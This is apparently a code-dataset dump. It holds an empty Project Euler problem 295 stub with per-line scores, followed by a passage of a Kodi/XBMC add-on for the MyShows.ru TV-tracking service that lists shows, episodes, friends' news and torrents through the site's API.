# -*- coding: utf-8 -*- # ProjectEuler/src/python/problem295.py # # Lenticular holes # ================ # Published on Saturday, 5th June 2010, 01:00 pm # # We call the convex area enclosed by two circles a lenticular hole if: The # centres of both circles are on lattice points. The two circles intersect at # two distinct lattice points. The interior of the convex area enclosed by both # circles does not contain any lattice points. Consider the circles: C0: # x2+y2=25 C1: (x+4)2+(y-4)2=1 C2: (x-12)2+(y-4)2=65 The circles C0, C1 # and C2 are drawn in the picture below. C0 and C1 form a lenticular hole, # as well as C0 and C2. We call an ordered pair of positive real numbers (r1, # r2) a lenticular pair if there exist two circles with radii r1 and r2 that # form a lenticular hole. We can verify that (1, 5) and (5, 65) are the # lenticular pairs of the example above. Let L(N) be the number of distinct # lenticular pairs (r1, r2) for which 0 r1 r2 N. We can verify that L(10) = # 30 and L(100) = 3442. Find L(100 000). import projecteuler as pe def main(): pass if __name__ == "__main__": main()
[ "# -*- coding: utf-8 -*-\n", "# ProjectEuler/src/python/problem295.py\n", "#\n", "# Lenticular holes\n", "# ================\n", "# Published on Saturday, 5th June 2010, 01:00 pm\n", "#\n", "# We call the convex area enclosed by two circles a lenticular hole if: The\n", "# centres of both circles are on lattice points. The two circles intersect at\n", "# two distinct lattice points. The interior of the convex area enclosed by both\n", "# circles does not contain any lattice points. Consider the circles: C0:\n", "# x2+y2=25 C1: (x+4)2+(y-4)2=1 C2: (x-12)2+(y-4)2=65 The circles C0, C1\n", "# and C2 are drawn in the picture below. C0 and C1 form a lenticular hole,\n", "# as well as C0 and C2. We call an ordered pair of positive real numbers (r1,\n", "# r2) a lenticular pair if there exist two circles with radii r1 and r2 that\n", "# form a lenticular hole. We can verify that (1, 5) and (5, 65) are the\n", "# lenticular pairs of the example above. Let L(N) be the number of distinct\n", "# lenticular pairs (r1, r2) for which 0 r1 r2 N. We can verify that L(10) =\n", "# 30 and L(100) = 3442. Find L(100 000).\n", "\n", "import projecteuler as pe\n", "\n", "def main():\n", " pass\n", "\n", "if __name__ == \"__main__\":\n", " main()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.08333333333333333, 0, 0, 0.037037037037037035, 0 ]
27
0.004458
false
# -*- coding: utf-8 -*- import urllib, re, sys, socket, json, os import xbmcplugin, xbmcgui, xbmc, xbmcaddon, xbmcvfs from functions import * from torrents import * from app import Handler, Link from rating import * __version__ = "1.8.9" __plugin__ = "MyShows.ru " + __version__ __author__ = "DiMartino" __settings__ = xbmcaddon.Addon(id='plugin.video.myshows') __language__ = __settings__.getLocalizedString login=__settings__.getSetting("username") ruName=__settings__.getSetting("ruName") change_onclick=__settings__.getSetting("change_onclick") cookie_auth=__settings__.getSetting("cookie_auth") useTVDB=getSettingAsBool('tvdb') socket.setdefaulttimeout(30) __addonpath__= __settings__.getAddonInfo('path') icon = __addonpath__+'/icon.png' __tmppath__= os.path.join(__addonpath__, 'tmp') forced_refresh_data=__settings__.getSetting("forced_refresh_data") refresh_period=int('1|4|12|24'.split('|')[int(__settings__.getSetting("refresh_period"))]) refresh_always=__settings__.getSetting("refresh_always") striplist=['the', 'tonight', 'show', 'with', '(2005)', '(2009)', '(2012)', ' ', ' ', ' ', ' ', ' ', ' ', ' '] Debug('[SYS ARGV]: '+str(urllib.unquote_plus(sys.argv[2]))[1:]) check_login = re.search('='+login+';', cookie_auth) if not check_login: cookie_auth=auth() class Main(Handler): def __init__(self): self.menu=[] menu_style=__settings__.getSetting("menu_style") top=ontop() if top: self.menu.append(top) if menu_style=='1': self.menu.extend([{"title":__language__(30111),"mode":"41"},{"title":__language__(30100),"mode":"10"}, {"title":__language__(30102),"mode":"17"},{"title":__language__(30150),"mode":"18"}, {"title":__language__(30103),"mode":"14"},{"title":__language__(30104),"mode":"15"}, {"title":__language__(30105),"mode":"16"},{"title":__language__(30106),"mode":"27"}, {"title":__language__(30107),"mode":"28"}, {"title":__language__(30108),"mode":"100"}, {"title":__language__(30112),"mode":"40"}, {"title":__language__(30101),"mode":"19"}, 
{"title":__language__(30149),"mode":"62"},]) else: self.menu.extend([{"title":__language__(30111),"mode":"41"},{"title":__language__(30139),"mode":"13"}, {"title":__language__(30106),"mode":"27"}, {"title":__language__(30107),"mode":"28"}, {"title":__language__(30108),"mode":"100"}, {"title":__language__(30112),"mode":"40"}, {"title":__language__(30136),"mode":"50"}, {"title":__language__(30137),"mode":"60"}, {"title":__language__(30101),"mode":"19"}, {"title":__language__(30146),"mode":"61"}, {"title":__language__(30141),"mode":"510"}]) if __settings__.getSetting("debug")=='true': self.menu.append({"title":"TEST","mode":"999"}) self.handle() if __settings__.getSetting("autoscan")=='true': auto_scan() friend_xbmc() def handle(self): for self.i in self.menu: try: argv=self.i['argv'] except: argv={'content': 'videos'} self.item(Link(self.i['mode'], argv), title=unicode(self.i['title'])) class ExtraFunction(Main): def __init__(self): self.menu=[] self.menu.extend([{"title":__language__(30136),"mode":"50"}, {"title":__language__(30137),"mode":"60"}, {"title":__language__(30146),"mode":"61"}, {"title":__language__(30141),"mode":"510"}, ]) self.handle() def Shows(): try: syncshows=SyncXBMC() except: syncshows=False saveCheckPoint() xbmcplugin.setContent(int(sys.argv[1]), 'tvshows') #lockView('info') if mode==19: KB = xbmc.Keyboard() if action: KB.setDefault(unicode(action)) KB.setHeading(__language__(30203)) KB.doModal() if (KB.isConfirmed()) and KB.getText() not in [None,'']: data= Data(cookie_auth, 'http://api.myshows.ru/shows/search/?q='+urllib.quote_plus(KB.getText())) else: return else: data=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/') jload=data.get() if jload: jdata = json.loads(jload) else: return #if mode in(11,12): # next_data=json.loads(Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/next/').get()) #else: # next_data=[] if mode==13: menu=[{"title":TextBB(__language__(30100), 'b'),"mode":"10", "argv":{}}, 
{"title":TextBB(__language__(30102), 'b'),"mode":"17", "argv":{}}, {"title":TextBB(__language__(30150), 'b'),"mode":"18", "argv":{}}, {"title":TextBB(__language__(30103), 'b'),"mode":"14", "argv":{}}, {"title":TextBB(__language__(30104), 'b'),"mode":"15", "argv":{}}, {"title":TextBB(__language__(30105), 'b'),"mode":"16", "argv":{}},] #{"title":TextBB('ONGOING', 'b'),"mode":"11", "argv":{}}, #{"title":TextBB('FULLSEASON', 'b'),"mode":"12", "argv":{}},] for i in menu: link=Link(i['mode'], i['argv']) h=Handler(int(sys.argv[1]), link) h.item(link, title=unicode(i['title'])) for showId in jdata: if ruName=='true' and jdata[showId]['ruTitle']: title=jdata[showId]['ruTitle'].encode('utf-8') else: title=jdata[showId]['title'] if mode not in (10,11,12,19): if mode!=18 and jdata[showId]['watchStatus']=="watching" and jdata[showId]['totalEpisodes']-jdata[showId]['watchedEpisodes']==0: continue elif mode not in (13,17) and jdata[showId]['watchStatus']=="watching" and jdata[showId]['totalEpisodes']-jdata[showId]['watchedEpisodes']!=0: continue elif mode!=14 and jdata[showId]['watchStatus']=="later": continue elif mode!=15 and jdata[showId]['watchStatus']=="finished": continue elif mode!=16 and jdata[showId]['watchStatus']=="cancelled": continue if mode==19: rating=int(jdata[showId]['watching']) else: rating=float(jdata[showId]['rating']) pre=prefix(showId=int(showId)) item = xbmcgui.ListItem(pre+title, iconImage='DefaultFolder.png', thumbnailImage=str(jdata[showId]['image'])) info={'title': title, 'label':title, 'tvshowtitle': jdata[showId]['title'], 'rating': rating*2, 'votes':1, 'year': '', } #'playcount':jdata[showId]['watchedEpisodes'], 'episode':jdata[showId]['totalEpisodes'] НЕ ХОЧУ ГАЛКИ try: info['plot']=__language__(30265) % (str(jdata[showId]['watchedEpisodes']), str(jdata[showId]['totalEpisodes']))+'\r\n'+__language__(30266)+' '+str(rating)+'\r\n' except:info['plot']='' if syncshows: item=syncshows.shows(jdata[showId]['title'], item, info) else: item.setInfo( 
type='Video', infoLabels=info) stringdata={"showId":int(showId), "seasonId":None, "episodeId":None, "id":None} refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/') sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+refresh_url+'&showId=' + str(showId) + '&mode=20' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) def Seasons(showId): data= Data(cookie_auth, 'http://api.myshows.ru/shows/'+showId) try: syncshows=SyncXBMC() except: syncshows=False saveCheckPoint() seasons, epdict=[], {} jdata = json.loads(data.get()) for id in jdata['episodes']: seasonNumber=jdata['episodes'][id]['seasonNumber'] if seasonNumber not in seasons: seasons.append(seasonNumber) epdict[str(jdata['episodes'][id]['seasonNumber'])]=str(jdata['episodes'][id]['id']) else: epdict[str(jdata['episodes'][id]['seasonNumber'])]=epdict[str(jdata['episodes'][id]['seasonNumber'])]+','+str(jdata['episodes'][id]['id']) seasons.sort() watched_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/') try:watched_jdata = json.loads(watched_data.get()) except: watched_jdata=None ratedict={} if watched_jdata: epdict=sortcomma(epdict, watched_jdata) ratedict=RateShow(int(showId),watched_jdata).seasonrates() info={'label':jdata['title'], 'year':jdata['year']} meta, banners = None, [] if syncshows and useTVDB: meta, banners = syncshows.episodes_meta(info) for sNumber in seasons: pre=prefix(showId=int(showId), seasonId=int(sNumber)) title=pre+__language__(30138)+' '+str(sNumber) stringdata={"showId":int(showId), "seasonId":int(sNumber), "episodeId":None, "id":None} sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + str(showId) + '&seasonNumber=' + str(sNumber) + '&mode=25' item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage='') if epdict[str(sNumber)]=='': playcount=1 else: playcount=0 votes=1 if 
ratedict.has_key(str(sNumber)): rating, votes=ratedict[str(sNumber)][0]*2,ratedict[str(sNumber)][1] else:rating=0 info={'title': title, 'label':jdata['title'], 'season':int(sNumber), 'playcount': playcount, 'rating': rating, 'votes':votes, 'year':jdata['year']} if syncshows: item=syncshows.episodes(jdata['title'], item, info, meta) if banners: banner=season_banner(banners, int(sNumber)) if banner: item.setThumbnailImage(banner) else: item.setInfo( type='Video', infoLabels=info ) refresh_url='&refresh_url='+urllib.quote_plus(str(watched_data.url)) item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) def Episodes(showId, seasonNumber): #lockView('info') xbmcplugin.setContent(int(sys.argv[1]), 'tvshows') data= Data(cookie_auth, 'http://api.myshows.ru/shows/'+showId) watched_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/'+showId+'/') jdata = json.loads(data.get()) try: syncshows=SyncXBMC() except: syncshows=False saveCheckPoint() try:watched_jdata = json.loads(watched_data.get()) except: watched_jdata=[] fanart=None if syncshows: info={'label':jdata['title'], 'year':jdata['year']} fanart=syncshows.episode_fanart(info) for id in jdata['episodes']: if jdata['episodes'][id]['seasonNumber']==int(seasonNumber): if id in watched_jdata: playcount=1 if watched_jdata[id]['rating']: rating=float(watched_jdata[id]['rating']) else: rating=0 else: playcount=0 rating=0 pre=prefix(showId=int(showId),seasonId=jdata['episodes'][id]['seasonNumber'], id=int(id), stype=None, episodeNumber=jdata['episodes'][id]['episodeNumber']) if not pre and syncshows.episode(jdata['title'], jdata['episodes'][id]['seasonNumber'], jdata['episodes'][id]['episodeNumber']): pre='[B][XBMC][/B]' title=pre+jdata['episodes'][id]['title']+' ['+jdata['episodes'][id]['airDate']+']' item = xbmcgui.ListItem('%s. 
%s' % (str(jdata['episodes'][id]['episodeNumber']), title), iconImage=str(jdata['episodes'][id]['image']), thumbnailImage=str(jdata['episodes'][id]['image'])) item.setInfo( type='Video', infoLabels={'Title': title, 'year': jdata['year'], 'episode': jdata['episodes'][id]['episodeNumber'], 'season': jdata['episodes'][id]['seasonNumber'], 'tracknumber': jdata['episodes'][id]['sequenceNumber'], 'playcount': playcount, 'rating': rating*2, 'tvshowtitle': jdata['title'], 'premiered': jdata['started'], 'status': jdata['status'], 'code': jdata['imdbId'], 'aired': jdata['episodes'][id]['airDate'], 'plot': __language__(30266)+' '+str(rating), 'votes': jdata['voted']} ) stringdata={"showId":int(showId), "episodeId":jdata['episodes'][id]['episodeNumber'], "id":int(id), "seasonId":jdata['episodes'][id]['seasonNumber']} if fanart: item.setProperty('fanart_image', fanart) sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&seasonNumber='+seasonNumber+'&showId='+showId+'&episodeId='+str(jdata['episodes'][id]['episodeNumber'])+'&id=' + str(id) + '&playcount=' + str(playcount) + '&mode=30' refresh_url='&refresh_url='+urllib.quote_plus(str(watched_data.url)) item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) sys_url=sys_url+refresh_url xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=False) def EpisodeMenu(id, playcount, refresh_url): if change_onclick=='true': xbmc.executebuiltin("Action(ToggleWatched)") Change_Status_Episode(showId, id, action, playcount, refresh_url) else: xbmc.executebuiltin("Action(ContextMenu)") def MyTorrents(): myt=TorrentDB() if sort!='shows' and showId==None: menu=[{"title":TextBB(__language__(30114), 'b'), "mode":"50", "argv":{'sort':'shows'}}, {"title":TextBB(__language__(30287), 'b'), "mode":"52", "argv":{}}, {"title":TextBB(__language__(30140), 'b'), "mode":"51", "argv":{}}, {"title":TextBB(__language__(30141), 'b'), "mode":"510", "argv":{}}] for i in menu: link=Link(i['mode'], 
i['argv']) h=Handler(int(sys.argv[1]), link) h.item(link, title=unicode(i['title'])) data=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/').get() jdata = json.loads(data) if sort=='shows': showlist=[] listdict=myt.get_all() for x in listdict: try: str_showId=str(x['showId']) try: if ruName=='true' and jdata[str_showId]['ruTitle']: show_title=jdata[str_showId]['ruTitle'] else: show_title=jdata[str_showId]['title'] except KeyError: show_title=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())['title'] title=show_title if str_showId not in showlist: showlist.append(str_showId) item = xbmcgui.ListItem(title+' (%s)'%(str(myt.countshowId(str_showId))), iconImage='DefaultFolder.png', thumbnailImage='') item.setInfo( type='Video', infoLabels={'Title': title } ) stringdata={"showId":x['showId'], "seasonId":None, "episodeId":None, "id":None} sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&sort=&showId='+str_showId+'&mode=50' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) except: Debug('[MyTorrents] Something went wrong with showId %s' % (str_showId), True) xbmcplugin.addSortMethod(handle=int(sys.argv[1]), sortMethod=xbmcplugin.SORT_METHOD_VIDEO_TITLE) else: if showId==None: listdict=myt.get_all() else: listdict=myt.get_all(showId=int(showId)) for x in listdict: try: str_showId=str(x['showId']) str_seasonId=str(x['seasonId']) str_episodeId=str(x['episodeId']) str_id=str(x['id']) str_filename=unicode(x['filename']) try: if ruName=='true' and jdata[str_showId]['ruTitle']: show_title=jdata[str_showId]['ruTitle'] else: show_title=jdata[str_showId]['title'] except: show_title=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())['title'] title='' if prefix(stype=x['stype']): title=prefix(stype=x['stype']) if str_seasonId!='None': title=title+' S'+int_xx(str_seasonId) if 
str_episodeId!='None': title=title+'E'+int_xx(str_episodeId) title+=' '+show_title item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage='') item.setInfo( type='Video', infoLabels={'Title': title } ) stringdata={"showId":x['showId'], "episodeId":x['episodeId'], "id":x['id'], "seasonId":x['seasonId']} sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&action='+urllib.quote_plus(str_filename.encode('utf-8'))+'&id='+str_id+'&mode=3020' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=False) except: Debug('[MyTorrents] Something went wrong with %s' % (str({"showId":x['showId'], "episodeId":x['episodeId'], "id":x['id'], "seasonId":x['seasonId']})), True) def MyScanList(): myscan=ScanDB() data=Data(cookie_auth, 'http://api.myshows.ru/profile/shows/').get() jdata = json.loads(data) listdict=myscan.get_all() for x in listdict: str_showId=str(x['showId']) str_seasonId=str(x['seasonId']) str_filename=unicode(x['filename']) try: if ruName=='true' and jdata[str_showId]['ruTitle']: show_title=jdata[str_showId]['ruTitle'] else: show_title=jdata[str_showId]['title'] except: show_title=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get())['title'] ifstat=myscan.isfilename(str_filename) if ifstat: title=TextBB('+', 'b') else: title=TextBB('-', 'b') if prefix(stype=x['stype']): title+=prefix(stype=x['stype']) if str_seasonId!='None': title+=' S'+int_xx(str_seasonId) title+=' '+show_title item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage='') item.setInfo( type='Video', infoLabels={'Title': title } ) stringdata={"showId":x['showId'], "episodeId":x['episodeId'], "id":x['id'], "seasonId":x['seasonId']} sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&action='+urllib.quote_plus(str_filename.encode('utf-8'))+'&mode=3020' item.addContextMenuItems(ContextMenuItems(sys_url, 
refresh_url, ifstat), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=False) def TopShows(action): xbmcplugin.setContent(int(sys.argv[1]), 'tvshows') if action!='tvdb':saveCheckPoint() useTVDBtop=getSettingAsBool('tvdbtop') if action=='all': for i in [(__language__(30109),'male'),(__language__(30110),'female'),(__language__(30151),'recomm'),(__language__(30152),'friends'),(__language__(30156),'xbmcfriends'),(__language__(30155),'tvdb')]: item = xbmcgui.ListItem(TextBB(i[0], 'b'), iconImage='DefaultFolder.png', thumbnailImage='') item.setInfo( type='Video', infoLabels={'Title': unicode(i[0])} ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=str('%s?action=%s&mode=100' %(sys.argv[0], i[1])), listitem=item, isFolder=True) elif action in ['recomm','friends','xbmcfriends']: Recommendations(action) return elif action=='tvdb': if not useTVDBtop: dialog = xbmcgui.Dialog() ok=dialog.yesno(__language__(30519),__language__(30517),__language__(30518)) if ok: __settings__.setSetting('tvdb','true') __settings__.setSetting('tvdbtop','true') gotoCheckPoint() return tdata=Data(cookie_auth, 'http://api.myshows.ru/shows/top/'+action+'/') get_data= tdata.get().lstrip('[{').rstrip('}]').split('},{') syncshows=False if useTVDBtop: try: syncshows=SyncXBMC() except: pass for data in get_data: jdata=json.loads('{'+data+'}') if ruName=='true' and jdata['ruTitle']: title=jdata['ruTitle'].encode('utf-8') else: title=jdata['title'] info={'title': title,'year': jdata['year'],'tvshowtitle': jdata['title'], 'status': jdata['status'],'votes': jdata['voted'],'rating': float(jdata['rating'])*2} item = xbmcgui.ListItem(str(jdata['place'])+'. 
'+title+' ('+str(jdata['year'])+')', iconImage='DefaultFolder.png', thumbnailImage=str(jdata['image'])) if syncshows: item=syncshows.shows(title, item, info) else: item.setInfo( type='Video', infoLabels=info ) stringdata={"showId":int(jdata['id']), "seasonId":None, "episodeId":None, "id":None} refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/') sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + str(jdata['id']) + '&mode=20' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) def Recommendations(action): try: syncshows=SyncXBMC() except: syncshows=False xbmcplugin.setContent(int(sys.argv[1]), 'tvshows') saveCheckPoint() result=[] login=__settings__.getSetting("username") if action=='xbmcfriends': action='friends' login='xbmchub' if action=='recomm': orig_before=u' <p class="description">' orig_after=u'</p> </th>' orig_false=u' </th>' subject=Data(cookie_auth, 'http://myshows.ru/profile/recommendations/').get().decode('utf-8') reobj = re.compile(u'<span class="status .+?"><a href=.+?/view/(\d+?)/">(.+?)</a></span>.+?(^'+orig_before+'.+?'+orig_after+'|'+orig_false+').+?<div style="width: (\d+)%"></div>.+?<td>(\d+)%</td>', re.DOTALL | re.MULTILINE) result = reobj.findall(subject) elif action=='friends': orig_before=u' <p class="description">' orig_after=u'</p> </th>' orig_false=u' </th>' subject=Data(cookie_auth, 'http://myshows.ru/'+login+'/friends/rating').get().decode('utf-8') reobj = re.compile(u'<span class="status .+?"><a href=.+?/view/(\d+?)/">(.+?)</a></span>.+?(^'+orig_before+'.+?'+orig_after+'|'+orig_false+').+?<div style="width: (\d+)%"></div>.+?<td width="\d+?%">(\d+)</td>.+?<td width="\d+?%">([0-9.]+)%</td>', re.DOTALL | re.MULTILINE) result = reobj.findall(subject) j=0 for i in result: j+=1 if action=='recomm': showId,title,origtitle,rating,recomm=i[0],i[1],i[2],i[3],i[4] 
listtitle=str(j)+'. ['+recomm+'%] '+title elif action=='friends': showId,title,origtitle,rating,friends,recomm=i[0],i[1],i[2],i[3],i[4],i[5] listtitle=str(j)+'. ['+friends+']['+recomm+'%] '+title if origtitle==orig_false: origtitle=title.encode('utf-8') else: origtitle=origtitle.replace(orig_before,'').replace(orig_after,'') title=title.encode('utf-8') if ruName!='true': title=origtitle rating=float(rating)/10 item = xbmcgui.ListItem(listtitle, iconImage='DefaultFolder.png',) info={'title': title, 'label':title, 'tvshowtitle': origtitle, 'rating': rating, 'year':''} if syncshows: item=syncshows.shows(title, item, info) else: item.setInfo( type='Video', infoLabels=info ) stringdata={"showId":int(showId), "seasonId":None, "episodeId":None, "id":None} refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/') sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + showId + '&mode=20' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) def EpisodeList(action): saveCheckPoint() item = xbmcgui.ListItem(' '+__language__(30114), iconImage='DefaultFolder.png', thumbnailImage='') item.setInfo( type='Video', infoLabels={'Title': __language__(30114), 'date': today_str()} ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=str(sys.argv[0] + '?action='+action+'&sort=shows&mode='+str(mode)), listitem=item, isFolder=True) show_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/') data= Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/'+action+'/') show_jdata = json.loads(show_data.get()) jdata = json.loads(data.get()) for id in jdata: str_showId=str(jdata[id]["showId"]) try: show_title=show_jdata[str_showId]['title'] except KeyError: show_jdata=json.loads(Data(cookie_auth, 'http://api.myshows.ru/profile/shows/', 'http://api.myshows.ru/profile/shows/').get()) 
try:show_title=show_jdata[str_showId]['title'] except KeyError: show_direct=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get()) show_title=show_direct['title'] show_jdata[str_showId]=show_direct if ruName=='true' and show_jdata[str_showId]['ruTitle']: show_title=show_jdata[str_showId]['ruTitle'] pre=prefix(id=int(id)) left=dates_diff(str(jdata[id]["airDate"]), 'today') title=pre+(__language__(30113) % (int_xx(str(jdata[id]['seasonNumber'])), int_xx(str(jdata[id]['episodeNumber'])), left, show_title, jdata[id]['title'])) item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=show_jdata[ str_showId ]['image'] ) item.setInfo( type='Video', infoLabels={'title': title, 'episode': jdata[id]['episodeNumber'], 'season': jdata[id]['seasonNumber'], 'date': jdata[id]['airDate'] } ) stringdata={"showId":int(str_showId), "episodeId":int(jdata[id]['episodeNumber']), "id":int(id), "seasonId":int(jdata[id]['seasonNumber'])} sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+'&showId=' + str_showId + '&id='+str(id)+'&seasonNumber=' + str(jdata[id]['seasonNumber']) + '&playcount=0&mode=30' refresh_url='&refresh_url='+urllib.quote_plus(str(data.url)) item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url+refresh_url, listitem=item, isFolder=False) def ShowList(action): show_data= Data(cookie_auth, 'http://api.myshows.ru/profile/shows/') data= Data(cookie_auth, 'http://api.myshows.ru/profile/episodes/'+action+'/') show_jdata = json.loads(show_data.get()) jdata = json.loads(data.get()) num_eps=dict() last_date=dict() first_date=dict() shows=dict() images=dict() for id in jdata: str_showId=str(jdata[id]["showId"]) str_date=str(jdata[id]["airDate"]) try: show_title=show_jdata[str_showId]['title'] except KeyError: show_jdata=json.loads(Data(cookie_auth, 'http://api.myshows.ru/profile/shows/', 'http://api.myshows.ru/profile/shows/').get()) 
try:show_title=show_jdata[str_showId]['title'] except KeyError: show_direct=json.loads(Data(cookie_auth, 'http://api.myshows.ru/shows/'+str_showId).get()) show_title=show_direct['title'] show_jdata[str_showId]=show_direct if ruName=='true' and show_jdata[str_showId]['ruTitle']: show_title=show_jdata[str_showId]['ruTitle'] if num_eps.get(str_showId)==None: num_eps[str_showId]=1 shows[str_showId]=show_title.encode('utf-8') last_date[str_showId]=str_date first_date[str_showId]=str_date images[str_showId]=show_jdata[str_showId]['image'] else: num_eps[str_showId]=int(num_eps[str_showId])+1 if fdate_bigger_ldate(last_date[str_showId],str_date)==False: last_date[str_showId]=str_date elif fdate_bigger_ldate(first_date[str_showId],str_date)==True: first_date[str_showId]=str_date for str_showId in num_eps: if num_eps[str_showId]==1: title=__language__(30115).encode('utf-8') % (last_date[str_showId], shows[str_showId], num_eps[str_showId]) else: title=__language__(30116).encode('utf-8') % (last_date[str_showId], first_date[str_showId], shows[str_showId], num_eps[str_showId]) item = xbmcgui.ListItem(title, iconImage='DefaultFolder.png', thumbnailImage=str(images[str_showId]) ) item.setInfo( type='Video', infoLabels={'Title': shows[str_showId], 'date': str(last_date[str_showId]) } ) stringdata={"showId":int(str_showId), "seasonId":None, "episodeId":None, "id":None} refresh_url='&refresh_url='+urllib.quote_plus(str(show_data.url)) sys_url = sys.argv[0] + '?stringdata='+makeapp(stringdata)+refresh_url+'&showId=' + str_showId + '&mode=20' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) def FriendsNews(): try: syncshows=SyncXBMC() except: syncshows=False i=[(__language__(30158),''),(__language__(30157),'xbmchub')] if action==None: first=1 cookie_auth=__settings__.getSetting("cookie_auth") else: first=0 cookie_auth=auth_xbmc() item = 
xbmcgui.ListItem(TextBB(i[first][0], 'b'), iconImage='DefaultFolder.png', thumbnailImage='') item.setInfo( type='Video', infoLabels={'title': unicode(i[0])} ) xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=str('%s?action=%s&mode=40' %(sys.argv[0], i[first][1])), listitem=item, isFolder=True) data=Data(cookie_auth, 'http://api.myshows.ru/profile/').get() jfr, avatars=json.loads(data), {} for i in jfr["friends"]: avatars[i["login"]]=i["avatar"]+"0" get_data= get_url(cookie_auth, 'http://api.myshows.ru/profile/news/') jx=json.loads(get_data) for u in jx: for jdata in jx[u]: if jdata['gender']=='m': title_str=__language__(30117) else: title_str=__language__(30118) if jdata['episodeId']>0: title=__language__(30119) % (jdata['login'], title_str, str(jdata['episode']), jdata['show']) else: title=__language__(30120) % (jdata['login'], title_str, str(jdata['episodes']), jdata['show']) try:item = xbmcgui.ListItem(title, iconImage=avatars[jdata["login"]], thumbnailImage=avatars[jdata["login"]]) except:item = xbmcgui.ListItem(title, iconImage='', thumbnailImage='') info={'title': jdata['show'],'label': jdata['show'],'tvshowtitle': jdata['show'],'year':''} if syncshows: item=syncshows.shows(title, item, info, avatar=True) else: item.setInfo( type='Video', infoLabels=info ) refresh_url='&refresh_url='+urllib.quote_plus('http://api.myshows.ru/profile/shows/') sys_url = sys.argv[0] + '?showId=' + str(jdata['showId'])+'&mode=20' item.addContextMenuItems(ContextMenuItems(sys_url, refresh_url), True ) sys_url=sys.argv[0] + '?action=' + jdata['login'] + '&mode=41' xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) def Profile(action, sort='profile'): data= Data(cookie_auth, 'http://api.myshows.ru/profile/'+action).get() jdata=json.loads(data) if sort!='profile': flist=[] if sort!='friend': if sort=='friends': if 'friends' in jdata: flist=jdata['friends'] elif sort=='followers': if 'followers' in jdata: flist=jdata['followers'] for 
arr in flist: if arr['gender']=='m': title_str=__language__(30121) else: title_str=__language__(30122) days=arr['wastedTime']/24 title=__language__(30123) % (arr['login'], title_str, str(days), str(arr['wastedTime'])) avatar=arr['avatar']+'0' item = xbmcgui.ListItem(title, iconImage=avatar, thumbnailImage=avatar) item.setInfo( type='Video', infoLabels={'Title': title }) sys_url=sys.argv[0] + '?action=' + arr['login'] + '&mode=41&sort=profile' xbmcplugin.addDirectoryItem(handle=int(sys.argv[1]), url=sys_url, listitem=item, isFolder=True) elif action: xbmcplugin.setContent(int(sys.argv[1]), 'tvshows') try: syncshows=SyncXBMC() except: syncshows=False orig_before=u' <p class="description">' orig_after=u'</p> </th>' orig_false=u' </th>' subject=Data(cookie_auth, 'http://myshows.ru/'+action+'/wasted').get().decode('utf-8') reobj = re.compile(r'<span class="status .+?"><a href="http://myshows.ru/view/(\d+)/">(.+?)</a></span>.+?(^'+orig_before+'.+?'+orig_after+'|'+orig_false+').+?.+?<div style="width: 